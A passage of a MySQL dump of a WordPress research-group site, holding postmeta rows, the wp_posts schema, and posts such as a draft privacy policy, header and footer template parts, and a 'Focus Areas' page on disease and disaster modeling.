ture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2669,1876,'_wp_attached_file','2024/11/Anshul-Gupta.jpg'),(2670,1876,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1984;s:6:\"height\";i:1984;s:4:\"file\";s:24:\"2024/11/Anshul-Gupta.jpg\";s:8:\"filesize\";i:425628;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1731439857\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2671,1878,'extend_builder','a:2:{s:4:\"json\";i:562;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:227:{i:0;i:407;i:1;i:970;i:2;i:971;i:3;i:972;i:4;i:973;i:5;i:974;i:6;i:975;i:7;i:976;i:8;i:977;i:9;i:972;i:10;i:978;i:11;i:974;i:12;i:975;i:13;i:976;i:14;i:979;i:15;i:972;i:16;i:980;i:17;i:974;i:18;i:975;i:19;i:976;i:20;i:981;i:21;i:972;i:22;i:982;i:23;i:974;i:24;i:975;i:25;i:976;i:26;i:983;i:27;i:972;i:28;i:973;i:29;i:974;i:30;i:975;i:31;i:976;i:32;i:977;i:33;i:972;i:34;i:973;i:35;i:974;i:36;i:975;i:37;i:976;i:38;i:977;i:39;i:972;i:40;i:973;i:41;i:974;i:42;i:975;i:43;i:976;i:44;i:977;i:45;i:972;i:46;i:973;i:47;i:974;i:48;i:975;i:49;i:976;i:50;i:977;i:51;i:972;i:52;i:973;i:53;i:974;i:54;i:975;i:55;i:976;i:56;i:977;i:57;i:972;i:58;i:973;i:59;i:974;i:60;i:975;i:61;i:976;i:62;i:977;i:63;i:972;i:64;i:973;i:65;i:974;i:66;i:975;i:67;i:976;i:68;i:977;i:69;i:984;i:70;i:985;i:71;i:986;i:72;i:846;i:73;i:847;i:74;i:848;i:75;i:854;i:76;i:850;i:77;i:851;i:78;i:902;i:79;i:855;i:80;i:848;i:81;i:849;i:82;i:850;i:83;i:851;i:84;i:901;i:85;i:853;i:86;i:848;i:87;i:856;i:88;i:850;i:89;i:851;i:90;i:852;i:91;i:857;i:92;i:848;i:93;i:854;i:94;i:850;i:95;i:851;i:96;i:902;i:97;i:855;i:98;i:848;i:99;i:854;i:100;i:850;i:101;i:851;i:102;i:902;i:103;i:855;i:104;i:848;i:105;i:854;i:106;i:850;i:107;i:851;i:108;i:902;i:109;i:848;i:110;i:854;i:111;i:850;i:112;i:851;i:113;i:902;i:114;i:855;i:115;i:848;i:116;i:854;i:117;i:850;i:118;i:851;i:119;i:902;i:120;i:855;i:121;i:848;i:122;i:854;i:123;i:850;i:124;i:851;i:125;i:902;i:126;i:855;i:127;i:848;i:128;i:854;i:129;i:850;i:130;i:851;i:131;i:902;i:132;i:855;i:133;i:848;i:134;i:854;i:135;i:850;i:136;i:851;i:137;i:902;i:138;i:855;i:139;i:848;i:140;i:854;i:141;i:850;i:142;i:851;i:143;i:902;i:144;i:855;i:145;i:860;i:146;i:861;i:147;i:862;i:148;i:828;i:149;i:829;i:150;i:830;i:151;i:831;i:152;i:832;i:153;i:833;i:154;i:835;i:155;i:842;i:156;i:843;i:157;i:844;i:158;i:910;i:159;i:911;i:160;i:912;i:161;i:913;i:162;i:914;i:163;i:915;i:164;i:917;i:165;i:912;i:166;i:918;i:167;i:914;i:168;i:915;i:169;i:919;i:170;i:912;i:171;i:920;i:172;i:914;i:173;i:915;i:174;i:921;i:175;i:912;i:176;i:922;i:177;i:914;i:178;i:915;i:179;i:923;i:180;i:912;i:181;i:913;i:182;i:914;i:183;i:915;i:184;i:917;i:185;i:912;i:186;i:913;i:187;i:914;i:188;i:915;i:189;i:917;i:190;i:912;i:191;i:913;i:192;i:914;i:193;i:915;i:194;i:917;i:195;i:912;i:196;i:913;i:197;i:914;i:198;i:915;i:199;i:912;i:200;i:913;i:201;i:914;i:202;i:915;i:203;i:917;i:204;i:912;i:205;i:913;i:206;i:914;i:207;i:915;i:208;i:917;i:209;i:912;i:210;i:913;i:211;i:914;i:212;i:915;i:213;i:917;i:214;i:912;i:215;i:913;i:216;i:914;i:217;i:915;i:218;i:917;i:219;i:912;i:220;i:913;i:221;i:914;i:222;i:915;i:223;i:917;i:224;i:924;i:225;i:925;i:226;i:926;}}}'),(2672,1880,'extend_builder','a:2:{s:4:\"json\";i:26;s:4:\"meta\";a:4:{s:5:\"25-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"25-h9\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"25-h12\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:28:{i:0;i:34;i:1;i:35;i:2;i:36;i:3;i:37;i:4;i:38;i:5;i:39;i:6;i:40;i:7;i:41;i:8;i:42;i:9;i:43;i:10;i:44;i:11;i:50;i:12;i:45;i:13;i:46;i:14;i:47;i:15;i:48;i:16;i:49;i:17;i:51;i:18;i:52;i:19;i:53;i:20;i:54;i:21;i:55;i:22;i:56;i:23;i:57;i:24;i:58;i:25;i:59;i:26;i:60;i:27;i:278;}}}'),(2673,1882,'extend_builder','a:2:{s:4:\"json\";i:29;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:5:{i:0;i:266;i:1;i:267;i:2;i:268;i:3;i:269;i:4;i:270;}}}'),(2674,1874,'_wp_trash_meta_status','publish'),(2675,1874,'_wp_trash_meta_time','1731595718');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts`
--
DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext NOT NULL,
`post_title` text NOT NULL,
`post_excerpt` text NOT NULL,
`post_status` varchar(20) NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) NOT NULL DEFAULT 'open',
`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=1883 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (3,1,'2022-02-14 21:44:32','2022-02-14 21:44:32','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: https://gsudice.dataconn.net.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Comments</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Media</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Cookies</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Embedded content from other websites</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph -->','Privacy Policy','','draft','closed','open','','privacy-policy','','','2022-02-14 21:44:32','2022-02-14 21:44:32','',0,'https://gsudice.dataconn.net/?page_id=3',0,'page','',0),(6,1,'2022-02-15 15:07:48','2022-02-15 15:07:48','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-bricksy','','','2022-02-15 15:07:48','2022-02-15 15:07:48','',0,'https://gsudice.dataconn.net/2022/02/15/wp-global-styles-bricksy/',0,'wp_global_styles','',0),(7,1,'2022-02-15 15:08:20','2022-02-15 15:08:20','','DICE log-6 sides-Largbox_text','','inherit','open','closed','','dice-log-6-sides-largbox_text','','','2022-02-15 15:08:20','2022-02-15 15:08:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/DICE-log-6-sides-Largbox_text.png',0,'attachment','image/png',0),(8,1,'2022-02-15 15:09:09','2022-02-15 15:09:09','<!-- wp:group {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"2px\",\"left\":\"2px\"}}},\"layout\":{\"inherit\":true}} -->\n<div class=\"wp-block-group\" style=\"padding-top:0rem;padding-right:2px;padding-left:2px\"><!-- wp:group {\"align\":\"wide\",\"style\":{\"spacing\":{\"padding\":{\"bottom\":\"calc(.5*var(\\u002d\\u002dwp\\u002d\\u002dcustom\\u002d\\u002dspacing\\u002d\\u002dsmall, 1.25rem))\",\"top\":\"calc(.5*var(\\u002d\\u002dwp\\u002d\\u002dcustom\\u002d\\u002dspacing\\u002d\\u002dsmall, 1.25rem))\",\"right\":\"2rem\",\"left\":\"2rem\"}}},\"layout\":{\"type\":\"flex\",\"justifyContent\":\"space-between\"}} -->\n<div class=\"wp-block-group alignwide\" style=\"padding-top:calc(.5*var(--wp--custom--spacing--small, 1.25rem));padding-right:2rem;padding-bottom:calc(.5*var(--wp--custom--spacing--small, 1.25rem));padding-left:2rem\"><!-- wp:group {\"layout\":{\"type\":\"flex\"}} -->\n<div class=\"wp-block-group\"><!-- wp:site-logo {\"width\":174.331125827815,\"shouldSyncIcon\":true} /--></div>\n<!-- /wp:group -->\n\n<!-- wp:navigation {\"layout\":{\"type\":\"flex\",\"setCascadingProperties\":true,\"justifyContent\":\"right\"}} /--></div>\n<!-- /wp:group --></div>\n<!-- /wp:group -->','Header','','publish','closed','closed','','header','','','2022-02-15 15:09:09','2022-02-15 15:09:09','',0,'https://gsudice.dataconn.net/2022/02/15/header/',0,'wp_template_part','',0),(9,1,'2022-02-15 15:09:09','2022-02-15 15:09:09','<!-- wp:group {\"align\":\"full\",\"style\":{\"spacing\":{\"padding\":{\"top\":\"3rem\",\"bottom\":\"8rem\",\"right\":\"3rem\",\"left\":\"3rem\"}}},\"layout\":{\"inherit\":true}} -->\n<div class=\"wp-block-group alignfull\" style=\"padding-top:3rem;padding-right:3rem;padding-bottom:8rem;padding-left:3rem\"><!-- wp:columns {\"align\":\"wide\"} -->\n<div class=\"wp-block-columns alignwide\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading {\"level\":4} -->\n<h4 id=\"about-us\">About Us</h4>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Etiam consequat sem ullamcorper, euismod metus sit amet, tristi justo. Vestibulum mattis, nisi ut.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>email: </strong><a href=\"#\">bricksy@example.com</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>phone: </strong><a href=\"#\">+1 265 013 7253</a></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading {\"level\":4} -->\n<h4 id=\"our-adventures\">Our Adventures</h4>\n<!-- /wp:heading -->\n\n<!-- wp:columns {\"align\":\"wide\"} -->\n<div class=\"wp-block-columns alignwide\"><!-- wp:column {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"0rem\",\"bottom\":\"0rem\",\"left\":\"0rem\"}}}} -->\n<div class=\"wp-block-column\" style=\"padding-top:0rem;padding-right:0rem;padding-bottom:0rem;padding-left:0rem\"><!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-1.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-2.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"0rem\",\"bottom\":\"0rem\",\"left\":\"0rem\"}}}} -->\n<div class=\"wp-block-column\" style=\"padding-top:0rem;padding-right:0rem;padding-bottom:0rem;padding-left:0rem\"><!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-3.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":4348,\"linkDestination\":\"none\",\"className\":\"size-large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-4.jpg\" alt=\"Nature Image\" class=\"wp-image-4348\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"0rem\",\"bottom\":\"0rem\",\"left\":\"0rem\"}}}} -->\n<div class=\"wp-block-column\" style=\"padding-top:0rem;padding-right:0rem;padding-bottom:0rem;padding-left:0rem\"><!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-5.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-6.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading {\"level\":4} -->\n<h4 id=\"categories\">Categories</h4>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"#\">Experience Thailand </a></li><li><a href=\"#\">Best Adventures</a></li><li><a href=\"#\"></a><a href=\"#\">Sea & Beach </a></li><li><a href=\"#\">Hiking Tours</a><a href=\"#\"> </a></li><li><a href=\"#\">Kayaking Tours</a><a href=\"#\"> </a></li><li><a href=\"#\">Winter Destinations</a></li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator {\"align\":\"wide\",\"className\":\"is-style-wide\"} -->\n<hr class=\"wp-block-separator alignwide is-style-wide\"/>\n<!-- /wp:separator -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:social-links {\"iconColor\":\"foreground\",\"iconColorValue\":\"#000000\",\"align\":\"center\",\"className\":\"has-icon-color is-style-logos-only\"} -->\n<ul class=\"wp-block-social-links aligncenter has-icon-color is-style-logos-only\"><!-- wp:social-link {\"url\":\"https://wordpress.org\",\"service\":\"wordpress\"} /-->\n\n<!-- wp:social-link {\"url\":\"twitter.com\",\"service\":\"twitter\"} /-->\n\n<!-- wp:social-link {\"url\":\"instagram.com\",\"service\":\"instagram\"} /--></ul>\n<!-- /wp:social-links -->\n\n<!-- wp:group {\"align\":\"wide\",\"style\":{\"spacing\":{\"padding\":{\"top\":\"4rem\",\"bottom\":\"4rem\"}}},\"layout\":{\"type\":\"flex\",\"justifyContent\":\"space-between\"}} -->\n<div class=\"wp-block-group alignwide\" style=\"padding-top:4rem;padding-bottom:4rem\"><!-- wp:site-title /-->\n\n<!-- wp:paragraph {\"align\":\"right\"} -->\n<p class=\"has-text-align-right\">Proudly powered by <a href=\"https://wordpress.org\" rel=\"nofollow\">WordPress</a></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:group --></div>\n<!-- /wp:group -->','Footer','','publish','closed','closed','','footer','','','2022-02-15 15:09:09','2022-02-15 15:09:09','',0,'https://gsudice.dataconn.net/2022/02/15/footer/',0,'wp_template_part','',0),(18,1,'2022-02-15 15:45:11','2022-02-15 15:45:11','','header','','inherit','open','closed','','header-2','','','2022-02-15 15:45:11','2022-02-15 15:45:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/header.jpg',0,'attachment','image/jpeg',0),(20,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path>\n </svg></span></div>\n <div data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\">\n <path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path>\n </svg></span></div>\n <div data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 